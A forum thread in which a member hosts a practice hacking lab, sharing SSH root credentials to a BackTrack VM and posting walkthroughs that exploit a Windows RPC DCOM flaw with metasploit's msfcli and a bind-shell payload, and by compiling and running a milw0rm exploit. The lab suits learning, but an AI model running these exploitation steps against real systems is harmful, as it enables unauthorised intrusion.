New Rooting Challenges

Alright so I have set up a lab for you to practice rooting in. I will change the exploit every day or two.

You will need to ssh to my backtrack distro at 75.16.244.69 on port 22. user:root pass:lolpassword

Challenge 2: Medium

Again exploit the box located at 192.168.5.155 and append your name to the winners.txt file located in the /tmp/I_win/ directory.

Note: This is not a bruteforce exercise, the passwords to the machine are over 20 characters long, so dont try. Exploit it another way.

Enjoy

Challenge 1: Easy

You must exploit the OS at 192.168.5.132 and print your name in the "I win.txt" file located on the desktop for credit.

Edit: I figured I would share how to append to a text file, so you dont erase others names.

echo username >> "I win.txt"

To confirm you name is there

type "I win.txt"

Please Read: This is a privilege and not a right. I have taken every step I can to ensure the safety of the rest of my network. However, this is not a free for all attack anything. Both the backtrack and other OS are VM machines. I do ask that you do not even attempt to hack other areas of the network or I will remove these games. I have granted you a root account on backtrack, please do not change the password or files so that others may enjoy as well. Do what ever attack you think necessary to exploit the allowed machine.

Done :D.

Sorry JJ, the idea is to use backtrack to exploit the other operating system at 192.168.5.132. Not make a txt file on the backtrack desktop :)

lol…. thought it was far too easy :D

Il give it another shot :p

You do know that once someone exploits the RPC service, it cant be exploited again until its restarted? I know I can get in via this method, but its not having it, so I tried netbios but Im using linux and smbclient has been giving me mixed results, I can 'use' the IPC$ share on the vulnerable host, but dir listing is denied, so I cant get any further with that route. The only one left seems to be mstask, ive seen rumors of perl exploit scripts, but no luck so far, and no version number.

When you set the difficulty as easy, where you expecting these attack vectors to be successful?

Thanks again for providing the box :D

Yes you can exploit the RPC several times. Not sure what type of payloads your using, but I reset it… Try again a simple bind shell would probably be the easiest route to take.

jjbutler88 wrote: lol…. thought it was far too easy :D

Il give it another shot :p

@ jjbutler88 lol i thought this was it at first to

Alright Im going to write a quick guide to this challenge because it seems that no one has beat it yet, but several have broke it. I really need to find a auto timed restarter, but thats besides the point.

Anyways so you did an nmap scan and found a few open ports, that listed what they were each possibly used for. Good keep that info.

After searching around google you find one thats a well known vulnerability. Lucky for us we can exploit this in the metasploit framework. Im going to use framework 2 for this particular challenge, mostly because the commands are shorter. (note theres also a metaterpreter that you can use for a different feel but I wont go into that now)

navigate to the /pentest/exploits/framework2 directory and we can begin with basic usage of this tool from the cli.

./msfcli –This lists all the exploits on the framework

./msfcli | grep "some info we got" – helps narrow our fields

./msfcli exploit_name – select the exploit we wish to use.

./msfcli exploit_name O
this will list all the options you must fill in to use this exploit. examples would be like RHOST and RPORT of the targets. IT will also show you any default configurations. So lets fill those in

./msfcli exploit_name RHOST=192.168.5.132 P the P will output all possible payloads for this exploit

For this example we will use a win32_bind shell

If you want to know the differences between the payloads use google or ask.

So no our exploit looks like this

./msfcli exploit_name RHOST=192.168.5.132 PAYLOAD=win32_bind E

*The E at the end just lets metasploit to execute that exploit.

Alright I have basically just showed you the easiest way to root that box, there are other ways of using this exploit/metasploit but its enough to get you going. all you really need to do is take that line and change exploit_name with the exploit you wish to use from metasploit.

Have fun

Fun. that last post did it for me

Alright it was pointed out that some may not like metasploit as you dont know whats going on behind the scenes. I am going to write another one where we compile the source from the milw0rm exploit archives located in /pentest/exploit directory

we can view all the exploits located at /pentest/exploit/milw0rm/sploitlist.txt

lets find the one we need from the right directory

cat sploitlist.txt | grep -i dcom

This will give us a list of available code to choose from. To determine the code you want to use you will first need to know what operating system you are going to compile the code on. You can determine this from viewing the headers.

for this challenge Im going to take one I can compile in backtrack and copy it into the tmp direcotry

cp ./platforms/windows/remote/66.c /tmp/

you can view and edit this now with nano /tmp/66.c

This will allow you to see the exploit and how it works, also make any modifications if you have trouble compiling it or need to alter the shellcode or other important addresses.

gcc -o dcom 66.c #this will compile the code

./dcom will then show us its usage instructions.

./dcom 1 192.168.5.132 #game over

There Ive now shown you two different ways to go about this. One from metasploit one from the code itself.

NOTE: This way will cause the RPC to fail and be unusable for a second time, also will not work if you use it against the wrong operating system, and will cause the right one not to work aswell.

I tried using metasploit, but once you have done it once, RPC crashes and is not exploitable again until it is restarted. Perhaps there is a replacement for cronjob on windows? To restart the machine / service? or write a batch file to reboot rpc?

I know metasploit pretty well, but despite that I wanted to try another way in, as netbios was looking promising, but as of yet, I cant find any easy to use replacement of something like net use on windows.

For the next one, maybe install an old FTP server? I wrote a simple fuzzer a while ago, and would love to try it out for real on a target machine, then maybe even write my own exploit code.

Thats not a bad idea, and i am open to suggestion on different exploits you would like to see.

Also, using the command I showed in my metasploit command, does not require the pc to be restarted, granted you are right, almost every other one does break. Im not sure how I would go about writing a reset, but I will probably change it to a more stable exploit area in the near future.

What OS are you using? There are Schedules on Windows wich does the same work as cron. Write a program that restarts RPC then set it up every like hour or so :P

Now THAT is a slow connection! Or you downloading something? :ninja:

root_op wrote: Now THAT is a slow connection! Or you downloading something? :ninja:

Yeah not normally as bad, but downloadng a movie at this current time ….

Well, i rooted the M$ box but lost connection to it when i did ctrl+c :( Shit the same, got some further knowledge on exploiting though :D This inspired me to write a article on how to compile exploits in cygwin, thanks for your inspiration!

As a temporary fix, after you complete the goal, please type the following

C:\i386\devcon.exe reboot

If anyone would know how to time this or make an if statement with a proper rpc ping I would love to hear it.

maybe little idea for a tweak, don't you wanna put there some kind of filtering to the services, to make people use something more 'fancy' then simple nmap ip etc.

done…

Also the tutorial posts are worth a article ! ;)

@clone.

Its good in theory, but keep in mind Im running those 2 os's on the same computer that I use on a daily basis, so Im trying to minimize my resources dedicated to these particular challenges. I am also focusing more on the exploit path, and not as much with the penetration testing part. Basically the idea is nmap for quick info, then research those ports, and use, alter or develop, the exploitation path necessary to root the box.

I am currently working on another which will be similar in that the code will be available, but will need to be altered to change for the particular situation, more details in the near future.

Also nice job, and I see the reboot worked well :)

stdio wrote: @clone.

Its good in theory, but keep in mind Im running those 2 os's on the same computer that I use on a daily basis, so Im trying to minimize my resources dedicated to these particular challenges. I am also focusing more on the exploit path, and not as much with the penetration testing part. Basically the idea is nmap for quick info, then research those ports, and use, alter or develop, the exploitation path necessary to root the box.

I am currently working on another which will be similar in that the code will be available, but will need to be altered to change for the particular situation, more details in the near future.

Also nice job, and I see the reboot worked well :)

Oh didn't know that, I thought you're using separate box… Of course then it's understandable.

Great looking forward to it,

And yeah everything went smooth as hell. Btw thanks a lot for this, great experience !!

@stdio, check this for ideas for chal 2 :D

https://www.securinfos.info/old-softwares-vulnerable.php

Why not create something new so we might discover some 0days :D

That would limit it somewhat, 0days dont grow on trees :p. If only……

I dont know about everyone else, but i doubt my ability to discover a 0day in some new(ish) software.

bump for new challenge. And no its not an 0 day, but it is at least only a month old, and not really patched yet.

Edit: Instructions on first post.

New challenge seems promising really, think im missing something though:angry:

Its kind of obscure to identify the vulnerability, so if you get stuck feel free to pm me or add me to msn, and I will try to respond. I wont post the spoilers like I did with the last challenge in this post.

MSN: stdio_h@live.com

ok done, sick exploit :) but lame question, how the hell do you append in that client. append cmd ain't there, then I thought put might do it, but no. Dunno what cmd to use xD

same way as before

echo "userame" >> winners.txt

and then you can view the results

cat winners.txt

well either I got in wrong way or I'm idiot ( 2nd more likely ) :D but echo gives me "command not found"

yea clone4 found a way in due to the fact that netbios/samba didnt have a password attached to it.. Not my indented route but did gain access. I am going to fix that problem.

Still haven't found exploit no 2 :( gonna work on it later

Just rooted it, but forgot to exit ssh before I shut my lappy down :(

Sorry everyone, my bad.

Yeah I jsut saw this, unfortunetly Im at work so it wont be back up until later tonight (morning for most of you)

Also – jjbutler learn to put your name on the list… I didnt see it there :)

I tried using nano, as well as the method you provided, I was about to check it when I messed up. Im pretty sure you should have quotes around the username, like this:

echo "jjbutler88" >> "I win.txt"

But I followed your example, il try mine when its back up. I did get in, thats the annoying part :D

yea you are right with the quotes, but the file is named differently so you dont have to :P

/tmp/I_win/winners.txt

I still dont have access, is it back up yet?

sorry for the long delay, but its back up and running now.

stdio wrote: sorry for the long delay, but its back up and running now.

yeah, finally :happy::happy:

Done :D

Are there other challenges up at the mo? Seems to be more services running than I remember… Ive seen some DoS code for your ftp server you have going, obviously Im not going to dos you, but Im gonna rewrite a python version and share it here :D

yes I know there is a DoS attack against the FTP server, but I just grabbed a quick box and default ran it. A DOS will not give you root however, should be the same number of processes running as before, actually killed two (smbd, nmbd).